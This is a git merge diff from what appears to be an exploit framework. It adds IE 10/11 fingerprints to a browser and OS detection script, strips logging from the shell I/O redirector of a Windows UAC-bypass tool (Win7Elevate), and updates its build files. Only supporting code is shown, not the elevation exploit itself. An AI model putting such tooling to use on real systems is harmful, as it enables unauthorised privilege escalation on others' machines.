Merge remote-tracking branch 'upstream/master' into bypassuac_redo
Conflicts: external/source/exploits/make.bat
commit
2a6258be15
|
@ -196,8 +196,7 @@ window.os_detect.getVersion = function(){
|
||||||
if (!ua_version || 0 == ua_version.length) {
|
if (!ua_version || 0 == ua_version.length) {
|
||||||
ua_is_lying = true;
|
ua_is_lying = true;
|
||||||
}
|
}
|
||||||
} else if (!document.all && navigator.taintEnabled ||
|
} else if (navigator.oscpu && !document.all && navigator.taintEnabled || 'MozBlobBuilder' in window) {
|
||||||
'MozBlobBuilder' in window) {
|
|
||||||
// Use taintEnabled to identify FF since other recent browsers
|
// Use taintEnabled to identify FF since other recent browsers
|
||||||
// implement window.getComputedStyle now. For some reason, checking for
|
// implement window.getComputedStyle now. For some reason, checking for
|
||||||
// taintEnabled seems to cause IE 6 to stop parsing, so make sure this
|
// taintEnabled seems to cause IE 6 to stop parsing, so make sure this
|
||||||
|
@ -882,6 +881,18 @@ window.os_detect.getVersion = function(){
|
||||||
os_flavor = "7";
|
os_flavor = "7";
|
||||||
os_sp = "SP1";
|
os_sp = "SP1";
|
||||||
break;
|
break;
|
||||||
|
case "11016428":
|
||||||
|
// IE 11.0.9600.16428 / Windows 7 SP1
|
||||||
|
ua_version = "11.0";
|
||||||
|
os_flavor = "7";
|
||||||
|
os_sp = "SP1";
|
||||||
|
break;
|
||||||
|
case "10016384":
|
||||||
|
// IE 10.0.9200.16384 / Windows 8 x86
|
||||||
|
ua_version = "10.0";
|
||||||
|
os_flavor = "8";
|
||||||
|
os_sp = "SP0";
|
||||||
|
break;
|
||||||
case "1000":
|
case "1000":
|
||||||
// IE 10.0.8400.0 (Pre-release + KB2702844), Windows 8 x86 English Pre-release
|
// IE 10.0.8400.0 (Pre-release + KB2702844), Windows 8 x86 English Pre-release
|
||||||
ua_version = "10.0";
|
ua_version = "10.0";
|
||||||
|
|
Binary file not shown.
Binary file not shown.
|
@ -8,46 +8,6 @@
|
||||||
#include <windows.h>
|
#include <windows.h>
|
||||||
#include <WinIOCtl.h>
|
#include <WinIOCtl.h>
|
||||||
|
|
||||||
/*************************************************************************************************/
|
|
||||||
/*************************************************************************************************/
|
|
||||||
/*************************************************************************************************/
|
|
||||||
|
|
||||||
std::wstring CError::Format( DWORD ErrorCode )
|
|
||||||
{
|
|
||||||
return Format( ErrorCode, NULL, NULL );
|
|
||||||
}
|
|
||||||
|
|
||||||
std::wstring CError::Format(DWORD ErrorCode, const TCHAR *Title, const TCHAR *API)
|
|
||||||
{
|
|
||||||
LPVOID lpvMessageBuffer;
|
|
||||||
|
|
||||||
FormatMessage(
|
|
||||||
FORMAT_MESSAGE_ALLOCATE_BUFFER|FORMAT_MESSAGE_FROM_SYSTEM,
|
|
||||||
NULL, ErrorCode,
|
|
||||||
MAKELANGID(LANG_ENGLISH, SUBLANG_DEFAULT),
|
|
||||||
(LPTSTR)&lpvMessageBuffer, 0, NULL);
|
|
||||||
|
|
||||||
std::wstring result;
|
|
||||||
|
|
||||||
std::wostringstream es(TEXT(""));
|
|
||||||
es << ErrorCode;
|
|
||||||
|
|
||||||
if ( Title )
|
|
||||||
{ result.append( Title ); result.append( TEXT("\n") ); }
|
|
||||||
else
|
|
||||||
{ result.append( TEXT("ERROR") ); result.append( TEXT("\n") ); }
|
|
||||||
|
|
||||||
if ( API )
|
|
||||||
{ result.append( TEXT("API = ") );result.append( API ); result.append( TEXT("\n") ); }
|
|
||||||
result.append( TEXT("error code = ") );result.append( es.str() );result.append( TEXT("\n") );
|
|
||||||
if( lpvMessageBuffer )
|
|
||||||
{ result.append( TEXT("message = ") );result.append( (TCHAR *)lpvMessageBuffer );result.append( TEXT("\n") ); }
|
|
||||||
|
|
||||||
if ( lpvMessageBuffer )
|
|
||||||
{ LocalFree(lpvMessageBuffer); }
|
|
||||||
|
|
||||||
return result;
|
|
||||||
}
|
|
||||||
|
|
||||||
/*************************************************************************************************/
|
/*************************************************************************************************/
|
||||||
/*************************************************************************************************/
|
/*************************************************************************************************/
|
||||||
|
@ -142,90 +102,3 @@ CInterprocessStorage::~CInterprocessStorage()
|
||||||
CloseHandle( _hMapping );
|
CloseHandle( _hMapping );
|
||||||
}
|
}
|
||||||
|
|
||||||
/*************************************************************************************************/
|
|
||||||
/*************************************************************************************************/
|
|
||||||
/*************************************************************************************************/
|
|
||||||
|
|
||||||
std::wstring CLogger::GetPath()
|
|
||||||
{
|
|
||||||
std::wstring path;
|
|
||||||
|
|
||||||
TCHAR buffer[MAX_PATH];
|
|
||||||
if ( GetTempPath( MAX_PATH, buffer ) )
|
|
||||||
{
|
|
||||||
path.assign( buffer );
|
|
||||||
path.append( TEXT("w7e.log") );
|
|
||||||
}
|
|
||||||
|
|
||||||
return path;
|
|
||||||
}
|
|
||||||
|
|
||||||
void CLogger::Reset()
|
|
||||||
{
|
|
||||||
DeleteFile( GetPath().c_str() );
|
|
||||||
}
|
|
||||||
|
|
||||||
void CLogger::LogLine( std::wstring& Text )
|
|
||||||
{
|
|
||||||
std::wstring tmp( Text.c_str() );
|
|
||||||
tmp.append( TEXT("\n") );
|
|
||||||
Log( tmp );
|
|
||||||
}
|
|
||||||
|
|
||||||
void CLogger::LogLine( )
|
|
||||||
{
|
|
||||||
Log( TEXT("\n") );
|
|
||||||
}
|
|
||||||
|
|
||||||
void CLogger::LogLine( const TCHAR *Text )
|
|
||||||
{
|
|
||||||
if ( Text )
|
|
||||||
LogLine( std::wstring( Text ) );
|
|
||||||
}
|
|
||||||
|
|
||||||
void CLogger::Log( const TCHAR Char )
|
|
||||||
{
|
|
||||||
std::wstring tmp;
|
|
||||||
tmp.append( &Char, 1 );
|
|
||||||
Log( tmp );
|
|
||||||
}
|
|
||||||
|
|
||||||
void CLogger::Log( const TCHAR *Text )
|
|
||||||
{
|
|
||||||
if ( Text )
|
|
||||||
Log( std::wstring( Text ) );
|
|
||||||
}
|
|
||||||
|
|
||||||
void CLogger::Log( std::wstring& Text )
|
|
||||||
{
|
|
||||||
TCHAR buffer[MAX_PATH];
|
|
||||||
//
|
|
||||||
// We have to check it every time to be reflective if user created this file
|
|
||||||
// while program was runnig.
|
|
||||||
//
|
|
||||||
if ( GetModuleFileName( NULL, buffer, MAX_PATH ) )
|
|
||||||
{
|
|
||||||
std::wstring dbg( buffer );
|
|
||||||
dbg.append( TEXT(".debug") );
|
|
||||||
HANDLE hdbg = CreateFile( dbg.c_str(), FILE_READ_ACCESS, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, 0, NULL );
|
|
||||||
if ( INVALID_HANDLE_VALUE == hdbg )
|
|
||||||
return;
|
|
||||||
|
|
||||||
CloseHandle( hdbg );
|
|
||||||
}
|
|
||||||
|
|
||||||
HANDLE mutex = CreateMutex( NULL, FALSE, TEXT("CLoggerSync") );
|
|
||||||
if ( mutex ) WaitForSingleObject( mutex , INFINITE );
|
|
||||||
HANDLE hFile = CreateFile( GetPath().c_str(), FILE_ALL_ACCESS, 0, NULL, OPEN_ALWAYS, FILE_FLAG_WRITE_THROUGH, NULL );
|
|
||||||
if( INVALID_HANDLE_VALUE != hFile )
|
|
||||||
{
|
|
||||||
SetFilePointer( hFile, 0, NULL, FILE_END );
|
|
||||||
|
|
||||||
DWORD written;
|
|
||||||
WriteFile( hFile, Text.data(), Text.size() * sizeof(TCHAR), &written, NULL );
|
|
||||||
|
|
||||||
CloseHandle( hFile );
|
|
||||||
}
|
|
||||||
if ( mutex ) ReleaseMutex( mutex );
|
|
||||||
if ( mutex ) CloseHandle( mutex );
|
|
||||||
}
|
|
|
@ -13,9 +13,6 @@ DWORD WINAPI Redirector( LPVOID Parameter )
|
||||||
assert( Parameter );
|
assert( Parameter );
|
||||||
TRedirectorPair *pair = reinterpret_cast<TRedirectorPair*>( Parameter );
|
TRedirectorPair *pair = reinterpret_cast<TRedirectorPair*>( Parameter );
|
||||||
|
|
||||||
CLogger::Log( TEXT("Hello redirector thread: ") );
|
|
||||||
CLogger::LogLine( pair->Name );
|
|
||||||
|
|
||||||
CHAR read_buff[2];
|
CHAR read_buff[2];
|
||||||
DWORD nBytesRead,nBytesWrote;
|
DWORD nBytesRead,nBytesWrote;
|
||||||
|
|
||||||
|
@ -25,11 +22,7 @@ DWORD WINAPI Redirector( LPVOID Parameter )
|
||||||
{
|
{
|
||||||
if( ! ReadFile( pair->Source, read_buff, 1, &nBytesRead, NULL) )
|
if( ! ReadFile( pair->Source, read_buff, 1, &nBytesRead, NULL) )
|
||||||
{
|
{
|
||||||
CLogger::LogLine(
|
|
||||||
CError::Format(
|
|
||||||
GetLastError(),
|
|
||||||
pair->Name.c_str(),
|
|
||||||
TEXT("ReadFile") ) );
|
|
||||||
error = true && (!pair->KeepAlive);
|
error = true && (!pair->KeepAlive);
|
||||||
break;
|
break;
|
||||||
}
|
}
|
||||||
|
@ -67,11 +60,6 @@ DWORD WINAPI Redirector( LPVOID Parameter )
|
||||||
|
|
||||||
if ( ! WriteConsoleInput( pair->Destination, &inp, 1, &nBytesWrote) )
|
if ( ! WriteConsoleInput( pair->Destination, &inp, 1, &nBytesWrote) )
|
||||||
{
|
{
|
||||||
CLogger::LogLine(
|
|
||||||
CError::Format(
|
|
||||||
GetLastError(),
|
|
||||||
pair->Name.c_str(),
|
|
||||||
TEXT("WriteConsoleInput") ) );
|
|
||||||
error = true && (!pair->KeepAlive);
|
error = true && (!pair->KeepAlive);
|
||||||
break;
|
break;
|
||||||
}
|
}
|
||||||
|
@ -80,11 +68,6 @@ DWORD WINAPI Redirector( LPVOID Parameter )
|
||||||
{
|
{
|
||||||
if ( ! WriteFile( pair->Destination, &read_buff[i], 1, &nBytesWrote, NULL) )
|
if ( ! WriteFile( pair->Destination, &read_buff[i], 1, &nBytesWrote, NULL) )
|
||||||
{
|
{
|
||||||
CLogger::LogLine(
|
|
||||||
CError::Format(
|
|
||||||
GetLastError(),
|
|
||||||
pair->Name.c_str(),
|
|
||||||
TEXT("WriteFile") ) );
|
|
||||||
error = true && (!pair->KeepAlive);
|
error = true && (!pair->KeepAlive);
|
||||||
break;
|
break;
|
||||||
}
|
}
|
||||||
|
@ -92,8 +75,6 @@ DWORD WINAPI Redirector( LPVOID Parameter )
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
CLogger::Log( TEXT("Bye redirector thread: ") );
|
|
||||||
CLogger::LogLine( pair->Name );
|
|
||||||
return EXIT_SUCCESS;
|
return EXIT_SUCCESS;
|
||||||
}
|
}
|
||||||
|
|
||||||
|
|
|
@ -20,7 +20,6 @@
|
||||||
|
|
||||||
int _tmain(int argc, _TCHAR* argv[])
|
int _tmain(int argc, _TCHAR* argv[])
|
||||||
{
|
{
|
||||||
CLogger::LogLine(TEXT("TIOR: Hello"));
|
|
||||||
|
|
||||||
TRedirectorPair in = {0};
|
TRedirectorPair in = {0};
|
||||||
in.Source = CreateFile( STDIn_PIPE, FILE_ALL_ACCESS, 0, NULL, OPEN_EXISTING, 0, 0);
|
in.Source = CreateFile( STDIn_PIPE, FILE_ALL_ACCESS, 0, NULL, OPEN_EXISTING, 0, 0);
|
||||||
|
@ -79,9 +78,6 @@ int _tmain(int argc, _TCHAR* argv[])
|
||||||
CInterprocessStorage::GetString( TEXT("w7e_TIORArgs"), args );
|
CInterprocessStorage::GetString( TEXT("w7e_TIORArgs"), args );
|
||||||
CInterprocessStorage::GetString( TEXT("w7e_TIORDir"), dir );
|
CInterprocessStorage::GetString( TEXT("w7e_TIORDir"), dir );
|
||||||
|
|
||||||
CLogger::LogLine(TEXT("TIOR: shell=")); CLogger::LogLine(shell);
|
|
||||||
CLogger::LogLine(TEXT("TIOR: args=")); CLogger::LogLine(args);
|
|
||||||
CLogger::LogLine(TEXT("TIOR: dir=")); CLogger::LogLine(dir);
|
|
||||||
|
|
||||||
STARTUPINFO si = {0};si.cb = sizeof(si);
|
STARTUPINFO si = {0};si.cb = sizeof(si);
|
||||||
PROCESS_INFORMATION pi = {0};
|
PROCESS_INFORMATION pi = {0};
|
||||||
|
@ -100,11 +96,6 @@ int _tmain(int argc, _TCHAR* argv[])
|
||||||
|
|
||||||
if ( ! created )
|
if ( ! created )
|
||||||
{
|
{
|
||||||
CLogger::LogLine(
|
|
||||||
CError::Format(
|
|
||||||
GetLastError(),
|
|
||||||
TEXT("TIOR: Unable to create child process"),
|
|
||||||
TEXT("CreateProcess")));
|
|
||||||
|
|
||||||
return EXIT_FAILURE;
|
return EXIT_FAILURE;
|
||||||
}
|
}
|
||||||
|
@ -113,14 +104,12 @@ int _tmain(int argc, _TCHAR* argv[])
|
||||||
CloseHandle( pi.hThread );
|
CloseHandle( pi.hThread );
|
||||||
}
|
}
|
||||||
|
|
||||||
CLogger::LogLine(TEXT("TIOR: Shell has been started. Waiting..."));
|
|
||||||
HANDLE waiters[4] = {pi.hProcess, in.Thread, out.Thread, err.Thread} ;
|
HANDLE waiters[4] = {pi.hProcess, in.Thread, out.Thread, err.Thread} ;
|
||||||
//
|
//
|
||||||
// Waiting for eny handle to be freed.
|
// Waiting for eny handle to be freed.
|
||||||
// Either some IO thread will die or process will be oevered.
|
// Either some IO thread will die or process will be oevered.
|
||||||
//
|
//
|
||||||
WaitForMultipleObjects( 4, waiters, FALSE, INFINITE );
|
WaitForMultipleObjects( 4, waiters, FALSE, INFINITE );
|
||||||
CLogger::LogLine(TEXT("TIOR: Ensure that we processed all data in pipes"));
|
|
||||||
|
|
||||||
//
|
//
|
||||||
// Even if process was overed, we need to be sure that we readed all data from the redirected pipe.
|
// Even if process was overed, we need to be sure that we readed all data from the redirected pipe.
|
||||||
|
@ -132,11 +121,9 @@ int _tmain(int argc, _TCHAR* argv[])
|
||||||
// Dont forget to close child process. We need to be sure, if user terminated app which
|
// Dont forget to close child process. We need to be sure, if user terminated app which
|
||||||
// reads our redirected data, we terminate the target child app.
|
// reads our redirected data, we terminate the target child app.
|
||||||
//
|
//
|
||||||
CLogger::LogLine(TEXT("TIOR: Killing child process"));
|
|
||||||
TerminateProcess( pi.hProcess, EXIT_FAILURE );
|
TerminateProcess( pi.hProcess, EXIT_FAILURE );
|
||||||
CloseHandle( pi.hProcess );
|
CloseHandle( pi.hProcess );
|
||||||
|
|
||||||
CLogger::LogLine(TEXT("TIOR: Exit"));
|
|
||||||
|
|
||||||
//
|
//
|
||||||
// I will not close any handles here - system will terminate and close all by it self.
|
// I will not close any handles here - system will terminate and close all by it self.
|
||||||
|
|
|
@ -1,5 +1,5 @@
|
||||||
<?xml version="1.0" encoding="utf-8"?>
|
<?xml version="1.0" encoding="utf-8"?>
|
||||||
<Project DefaultTargets="Build" ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
|
<Project DefaultTargets="Build" ToolsVersion="12.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
|
||||||
<ItemGroup Label="ProjectConfigurations">
|
<ItemGroup Label="ProjectConfigurations">
|
||||||
<ProjectConfiguration Include="Debug|Win32">
|
<ProjectConfiguration Include="Debug|Win32">
|
||||||
<Configuration>Debug</Configuration>
|
<Configuration>Debug</Configuration>
|
||||||
|
@ -28,23 +28,27 @@
|
||||||
<ConfigurationType>Application</ConfigurationType>
|
<ConfigurationType>Application</ConfigurationType>
|
||||||
<UseDebugLibraries>true</UseDebugLibraries>
|
<UseDebugLibraries>true</UseDebugLibraries>
|
||||||
<CharacterSet>Unicode</CharacterSet>
|
<CharacterSet>Unicode</CharacterSet>
|
||||||
|
<PlatformToolset>v120</PlatformToolset>
|
||||||
</PropertyGroup>
|
</PropertyGroup>
|
||||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
|
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
|
||||||
<ConfigurationType>Application</ConfigurationType>
|
<ConfigurationType>Application</ConfigurationType>
|
||||||
<UseDebugLibraries>true</UseDebugLibraries>
|
<UseDebugLibraries>true</UseDebugLibraries>
|
||||||
<CharacterSet>Unicode</CharacterSet>
|
<CharacterSet>Unicode</CharacterSet>
|
||||||
|
<PlatformToolset>v120</PlatformToolset>
|
||||||
</PropertyGroup>
|
</PropertyGroup>
|
||||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
|
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
|
||||||
<ConfigurationType>Application</ConfigurationType>
|
<ConfigurationType>Application</ConfigurationType>
|
||||||
<UseDebugLibraries>false</UseDebugLibraries>
|
<UseDebugLibraries>false</UseDebugLibraries>
|
||||||
<WholeProgramOptimization>true</WholeProgramOptimization>
|
<WholeProgramOptimization>false</WholeProgramOptimization>
|
||||||
<CharacterSet>Unicode</CharacterSet>
|
<CharacterSet>Unicode</CharacterSet>
|
||||||
|
<PlatformToolset>v120</PlatformToolset>
|
||||||
</PropertyGroup>
|
</PropertyGroup>
|
||||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
|
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
|
||||||
<ConfigurationType>Application</ConfigurationType>
|
<ConfigurationType>Application</ConfigurationType>
|
||||||
<UseDebugLibraries>false</UseDebugLibraries>
|
<UseDebugLibraries>false</UseDebugLibraries>
|
||||||
<WholeProgramOptimization>true</WholeProgramOptimization>
|
<WholeProgramOptimization>false</WholeProgramOptimization>
|
||||||
<CharacterSet>Unicode</CharacterSet>
|
<CharacterSet>Unicode</CharacterSet>
|
||||||
|
<PlatformToolset>v120</PlatformToolset>
|
||||||
</PropertyGroup>
|
</PropertyGroup>
|
||||||
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
|
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
|
||||||
<ImportGroup Label="ExtensionSettings">
|
<ImportGroup Label="ExtensionSettings">
|
||||||
|
@ -63,26 +67,31 @@
|
||||||
</ImportGroup>
|
</ImportGroup>
|
||||||
<PropertyGroup Label="UserMacros" />
|
<PropertyGroup Label="UserMacros" />
|
||||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
|
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
|
||||||
<LinkIncremental>true</LinkIncremental>
|
<LinkIncremental>false</LinkIncremental>
|
||||||
<TargetName>$(ProjectName)32</TargetName>
|
<TargetName>$(ProjectName).$(PlatformShortName)</TargetName>
|
||||||
<OutDir>$(SolutionDir)$(Platform)\$(Configuration)\</OutDir>
|
<OutDir>$(Configuration)\$(Platform)\</OutDir>
|
||||||
|
<IntDir>$(Configuration)\$(Platform)\</IntDir>
|
||||||
</PropertyGroup>
|
</PropertyGroup>
|
||||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
|
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
|
||||||
<LinkIncremental>true</LinkIncremental>
|
<LinkIncremental>false</LinkIncremental>
|
||||||
<TargetName>$(ProjectName)64</TargetName>
|
<TargetName>$(ProjectName).$(PlatformShortName)</TargetName>
|
||||||
<OutDir>$(SolutionDir)$(Platform)\$(Configuration)\</OutDir>
|
<OutDir>$(Configuration)\$(Platform)\</OutDir>
|
||||||
|
<IntDir>$(Configuration)\$(Platform)\</IntDir>
|
||||||
</PropertyGroup>
|
</PropertyGroup>
|
||||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
|
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
|
||||||
<LinkIncremental>false</LinkIncremental>
|
<LinkIncremental>false</LinkIncremental>
|
||||||
<OutDir>$(SolutionDir)$(Platform)\$(Configuration)\</OutDir>
|
<OutDir>$(Configuration)\$(Platform)\</OutDir>
|
||||||
<TargetName>$(ProjectName)32</TargetName>
|
<TargetName>$(ProjectName).$(PlatformShortName)</TargetName>
|
||||||
<GenerateManifest>false</GenerateManifest>
|
<GenerateManifest>false</GenerateManifest>
|
||||||
|
<IntDir>$(Configuration)\$(Platform)\</IntDir>
|
||||||
</PropertyGroup>
|
</PropertyGroup>
|
||||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
|
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
|
||||||
<LinkIncremental>false</LinkIncremental>
|
<LinkIncremental>false</LinkIncremental>
|
||||||
<OutDir>$(SolutionDir)$(Platform)\$(Configuration)\</OutDir>
|
<OutDir>$(Configuration)\$(Platform)\</OutDir>
|
||||||
<TargetName>$(ProjectName)64</TargetName>
|
<TargetName>$(ProjectName).$(PlatformShortName)</TargetName>
|
||||||
<GenerateManifest>false</GenerateManifest>
|
<GenerateManifest>false</GenerateManifest>
|
||||||
|
<IntDir>$(Configuration)\$(Platform)\</IntDir>
|
||||||
|
<CodeAnalysisRuleSet>AllRules.ruleset</CodeAnalysisRuleSet>
|
||||||
</PropertyGroup>
|
</PropertyGroup>
|
||||||
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
|
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
|
||||||
<ClCompile>
|
<ClCompile>
|
||||||
|
@ -90,6 +99,8 @@
|
||||||
<WarningLevel>Level3</WarningLevel>
|
<WarningLevel>Level3</WarningLevel>
|
||||||
<Optimization>Disabled</Optimization>
|
<Optimization>Disabled</Optimization>
|
||||||
<PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
<PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
||||||
|
<MinimalRebuild>false</MinimalRebuild>
|
||||||
|
<FavorSizeOrSpeed>Size</FavorSizeOrSpeed>
|
||||||
</ClCompile>
|
</ClCompile>
|
||||||
<Link>
|
<Link>
|
||||||
<SubSystem>Console</SubSystem>
|
<SubSystem>Console</SubSystem>
|
||||||
|
@ -99,6 +110,10 @@
|
||||||
<Path>
|
<Path>
|
||||||
</Path>
|
</Path>
|
||||||
</BuildLog>
|
</BuildLog>
|
||||||
|
<PostBuildEvent>
|
||||||
|
<Command>
|
||||||
|
</Command>
|
||||||
|
</PostBuildEvent>
|
||||||
</ItemDefinitionGroup>
|
</ItemDefinitionGroup>
|
||||||
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
|
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
|
||||||
<ClCompile>
|
<ClCompile>
|
||||||
|
@ -106,11 +121,17 @@
|
||||||
<WarningLevel>Level3</WarningLevel>
|
<WarningLevel>Level3</WarningLevel>
|
||||||
<Optimization>Disabled</Optimization>
|
<Optimization>Disabled</Optimization>
|
||||||
<PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
<PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
||||||
|
<MinimalRebuild>false</MinimalRebuild>
|
||||||
|
<FavorSizeOrSpeed>Size</FavorSizeOrSpeed>
|
||||||
</ClCompile>
|
</ClCompile>
|
||||||
<Link>
|
<Link>
|
||||||
<SubSystem>Console</SubSystem>
|
<SubSystem>Console</SubSystem>
|
||||||
<GenerateDebugInformation>true</GenerateDebugInformation>
|
<GenerateDebugInformation>true</GenerateDebugInformation>
|
||||||
</Link>
|
</Link>
|
||||||
|
<PostBuildEvent>
|
||||||
|
<Command>
|
||||||
|
</Command>
|
||||||
|
</PostBuildEvent>
|
||||||
</ItemDefinitionGroup>
|
</ItemDefinitionGroup>
|
||||||
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
|
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
|
||||||
<ClCompile>
|
<ClCompile>
|
||||||
|
@ -121,6 +142,7 @@
|
||||||
<IntrinsicFunctions>true</IntrinsicFunctions>
|
<IntrinsicFunctions>true</IntrinsicFunctions>
|
||||||
<PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
<PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
||||||
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
|
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
|
||||||
|
<FavorSizeOrSpeed>Size</FavorSizeOrSpeed>
|
||||||
</ClCompile>
|
</ClCompile>
|
||||||
<Link>
|
<Link>
|
||||||
<SubSystem>Console</SubSystem>
|
<SubSystem>Console</SubSystem>
|
||||||
|
@ -132,6 +154,10 @@
|
||||||
<Path>
|
<Path>
|
||||||
</Path>
|
</Path>
|
||||||
</BuildLog>
|
</BuildLog>
|
||||||
|
<PostBuildEvent>
|
||||||
|
<Command>
|
||||||
|
</Command>
|
||||||
|
</PostBuildEvent>
|
||||||
</ItemDefinitionGroup>
|
</ItemDefinitionGroup>
|
||||||
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
|
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
|
||||||
<ClCompile>
|
<ClCompile>
|
||||||
|
@ -142,6 +168,7 @@
|
||||||
<IntrinsicFunctions>true</IntrinsicFunctions>
|
<IntrinsicFunctions>true</IntrinsicFunctions>
|
||||||
<PreprocessorDefinitions>WIN64;_WIN64;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
<PreprocessorDefinitions>WIN64;_WIN64;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
||||||
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
|
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
|
||||||
|
<FavorSizeOrSpeed>Size</FavorSizeOrSpeed>
|
||||||
</ClCompile>
|
</ClCompile>
|
||||||
<Link>
|
<Link>
|
||||||
<SubSystem>Console</SubSystem>
|
<SubSystem>Console</SubSystem>
|
||||||
|
@ -153,6 +180,10 @@
|
||||||
<Path>
|
<Path>
|
||||||
</Path>
|
</Path>
|
||||||
</BuildLog>
|
</BuildLog>
|
||||||
|
<PostBuildEvent>
|
||||||
|
<Command>
|
||||||
|
</Command>
|
||||||
|
</PostBuildEvent>
|
||||||
</ItemDefinitionGroup>
|
</ItemDefinitionGroup>
|
||||||
<ItemGroup>
|
<ItemGroup>
|
||||||
<ClInclude Include="stdafx.h" />
|
<ClInclude Include="stdafx.h" />
|
||||||
|
|
|
@ -1,6 +1,8 @@
|
||||||
|
|
||||||
Microsoft Visual Studio Solution File, Format Version 11.00
|
Microsoft Visual Studio Solution File, Format Version 12.00
|
||||||
# Visual Studio 2010
|
# Visual Studio 2013
|
||||||
|
VisualStudioVersion = 12.0.21005.1
|
||||||
|
MinimumVisualStudioVersion = 10.0.40219.1
|
||||||
Project("{2150E333-8FDC-42A3-9474-1A3956D46DE8}") = "Solution Items", "Solution Items", "{BB654285-1131-415D-B796-21045D32DF87}"
|
Project("{2150E333-8FDC-42A3-9474-1A3956D46DE8}") = "Solution Items", "Solution Items", "{BB654285-1131-415D-B796-21045D32DF87}"
|
||||||
ProjectSection(SolutionItems) = preProject
|
ProjectSection(SolutionItems) = preProject
|
||||||
Win7Elevate_v2_read_me.txt = Win7Elevate_v2_read_me.txt
|
Win7Elevate_v2_read_me.txt = Win7Elevate_v2_read_me.txt
|
||||||
|
@ -18,37 +20,32 @@ Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "Win7Elevate", "Win7Elevate\
|
||||||
EndProject
|
EndProject
|
||||||
Global
|
Global
|
||||||
GlobalSection(SolutionConfigurationPlatforms) = preSolution
|
GlobalSection(SolutionConfigurationPlatforms) = preSolution
|
||||||
Debug|Pocket PC 2003 (ARMV4) = Debug|Pocket PC 2003 (ARMV4)
|
|
||||||
Debug|Win32 = Debug|Win32
|
Debug|Win32 = Debug|Win32
|
||||||
Debug|x64 = Debug|x64
|
Debug|x64 = Debug|x64
|
||||||
Release|Pocket PC 2003 (ARMV4) = Release|Pocket PC 2003 (ARMV4)
|
|
||||||
Release|Win32 = Release|Win32
|
Release|Win32 = Release|Win32
|
||||||
Release|x64 = Release|x64
|
Release|x64 = Release|x64
|
||||||
EndGlobalSection
|
EndGlobalSection
|
||||||
GlobalSection(ProjectConfigurationPlatforms) = postSolution
|
GlobalSection(ProjectConfigurationPlatforms) = postSolution
|
||||||
{B36517F4-984C-422C-ADF9-85D5ACD4E30B}.Debug|Pocket PC 2003 (ARMV4).ActiveCfg = Debug|Win32
|
|
||||||
{B36517F4-984C-422C-ADF9-85D5ACD4E30B}.Debug|Win32.ActiveCfg = Debug|Win32
|
{B36517F4-984C-422C-ADF9-85D5ACD4E30B}.Debug|Win32.ActiveCfg = Debug|Win32
|
||||||
{B36517F4-984C-422C-ADF9-85D5ACD4E30B}.Debug|Win32.Build.0 = Debug|Win32
|
{B36517F4-984C-422C-ADF9-85D5ACD4E30B}.Debug|Win32.Build.0 = Debug|Win32
|
||||||
{B36517F4-984C-422C-ADF9-85D5ACD4E30B}.Debug|x64.ActiveCfg = Debug|x64
|
{B36517F4-984C-422C-ADF9-85D5ACD4E30B}.Debug|x64.ActiveCfg = Debug|x64
|
||||||
{B36517F4-984C-422C-ADF9-85D5ACD4E30B}.Release|Pocket PC 2003 (ARMV4).ActiveCfg = Release|Win32
|
